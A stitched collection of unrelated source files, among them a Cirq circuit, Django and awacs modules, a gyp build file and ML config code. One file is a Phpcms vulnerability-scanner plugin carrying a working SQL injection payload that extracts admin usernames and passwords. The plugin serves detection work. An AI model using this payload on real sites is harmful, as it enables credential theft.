cirq.rz(np.pi * -5.118027941327464).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 9.263573798570924).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -9.55041239213535).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -12.410072351850753).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 12.468621852670255).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 26.656199817881895).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -26.611019617243198).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -12.422336273583753).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 12.376024275975672).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 24.032508849527318).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -23.993220632379824).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -5.991658529535789).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 6.094768068552847).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -9.293307215154037).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 9.006468621589612).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -13.046692838556257).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 13.107006443219033).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -20.486755870544844).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 20.51325689904871).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -19.82814477311278).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 19.838469153514826).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 17.687652291347487).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -17.230577602838448).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5124128267683938, phi=0.5133142626030278).on(
cirq.GridQubit(4, 5), cirq.GridQubit(5, 5)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.71050872566315).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -12.650195121000372).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 19.562531408750814).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -19.53603038024695).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 18.69447149644039).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -18.684147116038343).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -18.21701654221441).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 18.674091230723448).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 39.34359792383697).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -39.42696290791402).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 38.52825306393881).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -38.452584830758425).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.958562501914345).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -13.049596611893888).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 15.428639843256777).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -15.42731467518594).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.47511091993527, phi=0.538612093835262).on(
cirq.GridQubit(3, 4), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -39.11725021952874).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 39.03388523545169).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -37.65488974563269).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 37.730557978813074).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -14.665863640797525).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 14.574829530817984).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -16.519871460773594).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 16.52119662884443).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 14.928737337703097).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -14.836929415695444).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -12.10125113388289).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.22245467467503).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -10.099134633961603).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 10.172407045184396).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5289739216684795, phi=0.5055240639761313).on(
cirq.GridQubit(4, 4), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -15.32421457749417).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 15.416022499501823).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 11.899075778124569).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -11.777872237332431).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 9.817341949396608).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -9.744069538173814).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 17.629359127188117).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -17.570809626368614).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -36.89270806725978).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 36.93788826789848).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 16.787954522971983).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -16.834266520580062).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -33.970047663366486).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 34.00933588051398).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 7.441137480344476).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -7.338027941327417).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 12.963573798570843).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -13.250412392135269).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -17.442072351850854).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 17.500621852670356).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 37.46019981788182).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -37.415019617243125).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -17.306336273583675).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 17.260024275975592).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 34.09650884952739).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -34.057220632379895).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -8.211658529535743).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 8.3147680685528).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -12.993307215153958).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 12.706468621589535).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
]
)
# ==== /server/podbaby/history/serializers.py (repo: danjac/podbaby2, no license) ====
from rest_framework import serializers
from history.models import Play
class PlaySerializer(serializers.ModelSerializer):
class Meta:
model = Play
fields = (
'episode',
'created',
)
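# Hypothetical usage sketch, not part of the original podbaby file: a plain DRF
# ModelSerializer like PlaySerializer validates incoming data and renders Play
# instances. The helper below and its episode_pk argument are illustrative only.
def record_play_example(episode_pk):
    serializer = PlaySerializer(data={'episode': episode_pk})
    serializer.is_valid(raise_exception=True)
    play = serializer.save()               # creates the history.Play row
    return PlaySerializer(play).data       # e.g. {'episode': 3, 'created': '2016-12-03T07:42:59Z'}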
# ==== /awacs/applicationinsights.py (repo: isabella232/awacs, BSD-2-Clause) ====
# Copyright (c) 2012-2013, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action as BaseAction
from aws import BaseARN
service_name = 'CloudWatch Application Insights'
prefix = 'applicationinsights'
class Action(BaseAction):
def __init__(self, action=None):
sup = super(Action, self)
sup.__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource='', region='', account=''):
sup = super(ARN, self)
sup.__init__(service=prefix, resource=resource, region=region,
account=account)
CreateApplication = Action('CreateApplication')
CreateComponent = Action('CreateComponent')
DeleteApplication = Action('DeleteApplication')
DeleteComponent = Action('DeleteComponent')
DescribeApplication = Action('DescribeApplication')
DescribeComponent = Action('DescribeComponent')
DescribeComponentConfiguration = Action('DescribeComponentConfiguration')
DescribeComponentConfigurationRecommendation = \
Action('DescribeComponentConfigurationRecommendation')
DescribeObservation = Action('DescribeObservation')
DescribeProblem = Action('DescribeProblem')
DescribeProblemObservations = Action('DescribeProblemObservations')
ListApplications = Action('ListApplications')
ListComponents = Action('ListComponents')
ListProblems = Action('ListProblems')
UpdateApplication = Action('UpdateApplication')
UpdateComponent = Action('UpdateComponent')
UpdateComponentConfiguration = Action('UpdateComponentConfiguration')
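# Hypothetical usage sketch, not part of the original awacs module: each Action
# object above stands for the IAM action string "applicationinsights:<name>", and
# ARN builds the matching resource ARN. The region and account id below are
# made-up placeholders; attaching these objects to a policy statement is left to
# the policy classes of the surrounding library.
if __name__ == '__main__':
    allowed_action = DescribeApplication  # represents "applicationinsights:DescribeApplication"
    resource_arn = ARN(resource='application/*', region='us-east-1', account='123456789012')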
# ==== /main_project/release-gyp/user/user_cache.gyp (repo: gunner14/old_rr_code, no license) ====
{
#Include the common settings
'includes':[
'user_common.gyp',
],
'variables':{
'service_name' : 'UserCache',
'service_src_path' : '<(main_project_path)/user/<(service_name)/',
},
'target_defaults' : {
'include_dirs' : [
'/usr/local/distcache-dev/include',
'/usr/local/distcache-util/include/',
'/usr/local/distcache/include/',
'<(main_project_path)/tripod-new/src/cpp/include',
'<(main_project_path)/TalkUtil/src',
'<(main_project_path)/third-party/include/',
'<(main_project_path)/third-party/apr/include/apr-1',
'<(main_project_path)/third-party/libactivemq/include/activemq-cpp-3.4.1',
'<(main_project_path)/third-party/redis-c-driver/',
'<(main_project_path)/message_pipe/src/cpp/',
],
'link_settings' : {
'libraries' : [
'-L../third-party/libactivemq/lib',
'-lactivemq-cpp',
        #Using either xce-dev or third-party on its own causes problems,
'-L../third-party/apr/lib',
'-L/usr/local/xce-dev/lib64',
'-lapr-1', '-laprutil-1',
'-L/usr/local/distcache-util/lib',
'-lrdc-client',
],
'ldflags': [
'-Wl,-rpath /usr/local/xce-dev/lib64',
'-Wl,-rpath /usr/lib64',
],
},
},
'targets' : [
######################################################
{
'target_name' : 'DistUserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/dist/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/src -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheAgent',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/agent -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCachePreloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/preloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)Test',
'type' : 'executable',
'dependencies' : [
'../gtest.gyp:gtest',
'../gtest.gyp:gtest_main',
'./user_slice_and_adapter.gyp:*'
# '../3rdparty.gyp:hiredis',
# '../base.gyp:base',
# '../xce_base.gyp:xce_base',
#'../tripod2.gyp:tripod_core',
],
'sources' : [
],
},
] #end targets
}
| [
"[email protected]"
]
| |
6d53bd2ad8620c52fba55ab8bda20744ee97b8a0 | dbe1f4110921a08cb13e22ea325d503bd5627195 | /chuhuo_2.7_clickhouse/bluedon/bdwafd/newscantools/plugins/Phpcms_post_clickSqlInjectionScript.py | 1001b1ccc85c453fcecb86d7c9553f38992ae182 | []
| no_license | Hehouhua/waf_branches | 92dc1b1cbecba20f24ef6c7372dde7caa43f9158 | ca76f3a1ed8150b423474c9e37aee37841a5ee35 | refs/heads/main | 2023-01-07T11:33:31.667688 | 2020-11-03T06:58:33 | 2020-11-03T06:58:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.common import *
def run_domain(http,ob):
list = []
try:
domain = ob['domain']
detail = u''
url = "%s://%s%s" % (ob['scheme'],ob['domain'],ob['base_path'])
expurl="%s%s"%(url,"index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2")
data=""
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain","Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x4E56535F54455354,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
#res, content = http.request(expurl,"POST",data,headers)
res, content = yx_httplib2_request(http,expurl,"POST",data,headers)
#print content
if content.find('NVS_TEST')>=0:
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
request = postRequest(expurl,"POST",headers,)
response = getResponse(res)
list.append(getRecord(ob,ob['scheme']+"://"+ob['domain'],ob['level'],detail,request,response))
except Exception,e:
logging.getLogger().error("File:phpcms_post_click.py, run_domain function :" + str(e) + ",task id:" + ob['task_id'] + ",domain id:" + ob['domain_id'])
write_scan_log(ob['task_id'],ob['domain_id'],"File:phpcms_post_click.py, run_domain function :" + str(e))
#end try
return list
#end def
# ==== /integration_distributed_training/config_files/helios/13_repeat20x031/config_00166.py (repo: Jessilee/ImportanceSamplingSGD, no license) ====
import numpy as np
import os
def get_model_config():
model_config = {}
#Importance sampling or vanilla sgd.
model_config["importance_algorithm"] = "isgd"
#model_config["importance_algorithm"] = "sgd"
#Momentum rate, where 0.0 corresponds to not using momentum
model_config["momentum_rate"] = 0.95
#The learning rate to use on the gradient averaged over a minibatch
model_config["learning_rate"] = 0.01
#config["dataset"] = "mnist"
model_config["dataset"] = "svhn"
#config["dataset"] = "kaldi-i84"
if model_config["dataset"] == "mnist":
print "Error. Missing values of (Ntrain, Nvalid, Ntest)"
quit()
model_config["num_input"] = 784
model_config["num_output"] = 10
elif model_config["dataset"] == "svhn":
(Ntrain, Nvalid, Ntest) = (574168, 30220, 26032)
model_config["num_input"] = 3072
model_config["num_output"] = 10
model_config["normalize_data"] = True
elif model_config["dataset"] == "kaldi-i84":
(Ntrain, Nvalid, Ntest) = (5436921, 389077, 253204)
model_config["num_input"] = 861
model_config["num_output"] = 3472
model_config["normalize_data"] = False
model_config['Ntrain'] = Ntrain
model_config['Nvalid'] = Nvalid
model_config['Ntest'] = Ntest
    # Pick one, depending on where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#data_root = { "serendib":"/home/dpln/data/data_lisa_data",
# "lambda":"/home/gyomalin/ML/data_lisa_data",
# "szkmbp":"/Users/gyomalin/Documents/fuel_data"}[socket.gethostname().lower()]
data_root = "/rap/jvb-000-aa/data/alaingui"
model_config["mnist_file"] = os.path.join(data_root, "mnist/mnist.pkl.gz")
model_config["svhn_file_train"] = os.path.join(data_root, "svhn/train_32x32.mat")
model_config["svhn_file_extra"] = os.path.join(data_root, "svhn/extra_32x32.mat")
model_config["svhn_file_test"] = os.path.join(data_root, "svhn/test_32x32.mat")
model_config["kaldi-i84_file_train"] = os.path.join(data_root, "kaldi/i84_train.gz")
model_config["kaldi-i84_file_valid"] = os.path.join(data_root, "kaldi/i84_valid.gz")
model_config["kaldi-i84_file_test"] = os.path.join(data_root, "kaldi/i84_test.gz")
model_config["load_svhn_normalization_from_file"] = True
model_config["save_svhn_normalization_to_file"] = False
model_config["svhn_normalization_value_file"] = os.path.join(data_root, "svhn/svhn_normalization_values.pkl")
model_config["hidden_sizes"] = [2048, 2048, 2048, 2048]
# Note from Guillaume : I'm not fond at all of using seeds,
# but here it is used ONLY for the initial partitioning into train/valid.
model_config["seed"] = 9999494
#Weights are initialized to N(0,1) * initial_weight_size
model_config["initial_weight_size"] = 0.01
#Hold this fraction of the instances in the validation dataset
model_config["fraction_validation"] = 0.05
model_config["master_routine"] = ["sync_params"] + ["refresh_importance_weights"] + (["process_minibatch"] * 32)
model_config["worker_routine"] = ["sync_params"] + (["process_minibatch"] * 10)
model_config["turn_off_importance_sampling"] = False
assert model_config['Ntrain'] is not None and 0 < model_config['Ntrain']
assert model_config['Nvalid'] is not None
assert model_config['Ntest'] is not None
return model_config
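# Illustrative helper, not part of the original config file: the fully-connected
# architecture implied by get_model_config() is num_input -> hidden_sizes -> num_output,
# i.e. for the SVHN settings above: 3072 -> 2048 -> 2048 -> 2048 -> 2048 -> 10.
def example_layer_shapes(model_config):
    sizes = [model_config["num_input"]] + model_config["hidden_sizes"] + [model_config["num_output"]]
    return list(zip(sizes[:-1], sizes[1:]))  # [(3072, 2048), (2048, 2048), (2048, 2048), (2048, 2048), (2048, 10)]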
def get_database_config():
# Try to connect to the database for at least 10 minutes before giving up.
# When setting this to below 1 minute on Helios, the workers would give up
    # way too easily. This value also controls how much time the workers will
# be willing to wait for the parameters to be present on the server.
connection_setup_timeout = 10*60
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#experiment_root_dir = { "serendib":"/home/dpln/tmp",
# "lambda":"/home/gyomalin/ML/tmp",
# "szkmbp":"/Users/gyomalin/tmp"}[socket.gethostname().lower()]
experiment_root_dir = "/rap/jvb-000-aa/data/alaingui/experiments_ISGD/00166"
redis_rdb_path_plus_filename = os.path.join(experiment_root_dir, "00166.rdb")
logging_folder = experiment_root_dir
want_rdb_background_save = True
    # This is part of a discussion about when the master should start
    # its training with uniform sampling SGD and when it should
    # perform importance sampling SGD.
    # The default value is set to np.NaN, and right now the criterion
    # to decide if a weight is usable is to check that it is not np.NaN.
    #
    # We can decide to add other options later to include the staleness
    # of the importance weights, or other similar criteria, to define
    # what constitutes a "usable" value.
default_importance_weight = np.NaN
#default_importance_weight = 1.0
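    # Illustration (an assumption, not part of the original config): with NaN as
    # the default, a usability check elsewhere in the codebase could be as simple
    # as
    #     usable = np.isfinite(importance_weight)
    # which is False for the NaN default, so the fraction of usable weights can be
    # compared against the ISGD threshold defined below.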
want_master_to_do_USGD_when_ISGD_is_not_possible = True
master_usable_importance_weights_threshold_to_ISGD = 0.1 # cannot be None
    # The master will only consider importance weights that were updated within this number of seconds.
staleness_threshold_seconds = 20
staleness_threshold_num_minibatches_master_processed = None
# Guillaume is not so fond of this approach.
importance_weight_additive_constant = 10.0
serialized_parameters_format ="opaque_string"
# These two values don't have to be the same.
# It might be possible that the master runs on a GPU
# and the workers run on CPUs just to try stuff out.
workers_minibatch_size = 2048
master_minibatch_size = 128
# This is not really being used anywhere.
# We should consider deleting it after making sure that it
# indeed is not being used, but then we could argue that it
# would be a good idea to use that name to automatically determine
# the values of (Ntrain, Nvalid, Ntest).
dataset_name='svhn'
L_measurements=["individual_importance_weight", "individual_gradient_square_norm", "individual_loss", "individual_accuracy", "minibatch_gradient_mean_square_norm"]
L_segments = ["train", "valid", "test"]
#
# The rest of this code is just checks and quantities generated automatically.
#
assert workers_minibatch_size is not None and 0 < workers_minibatch_size
assert master_minibatch_size is not None and 0 < master_minibatch_size
assert dataset_name is not None
assert serialized_parameters_format in ["opaque_string", "ndarray_float32_tostring"]
assert 0.0 <= master_usable_importance_weights_threshold_to_ISGD
assert master_usable_importance_weights_threshold_to_ISGD <= 1.0
return dict(connection_setup_timeout=connection_setup_timeout,
workers_minibatch_size=workers_minibatch_size,
master_minibatch_size=master_minibatch_size,
dataset_name=dataset_name,
L_measurements=L_measurements,
L_segments=L_segments,
want_only_indices_for_master=True,
want_exclude_partial_minibatch=True,
serialized_parameters_format=serialized_parameters_format,
default_importance_weight=default_importance_weight,
want_master_to_do_USGD_when_ISGD_is_not_possible=want_master_to_do_USGD_when_ISGD_is_not_possible,
master_usable_importance_weights_threshold_to_ISGD=master_usable_importance_weights_threshold_to_ISGD,
staleness_threshold_seconds=staleness_threshold_seconds,
staleness_threshold_num_minibatches_master_processed=staleness_threshold_num_minibatches_master_processed,
importance_weight_additive_constant=importance_weight_additive_constant,
logging_folder=logging_folder,
redis_rdb_path_plus_filename=redis_rdb_path_plus_filename,
want_rdb_background_save=want_rdb_background_save)
def get_helios_config():
# Optional.
return {}
| [
"[email protected]"
]
| |
8c9cac2973d6978608f4768621bb61a098589c65 | 8316b326d035266d41875a72defdf7e958717d0a | /Regression/Poly_linear_regression_boston_house_predict.py | 465a1cccc33d4b05fe7f9a57daa1fb6da7a7de61 | []
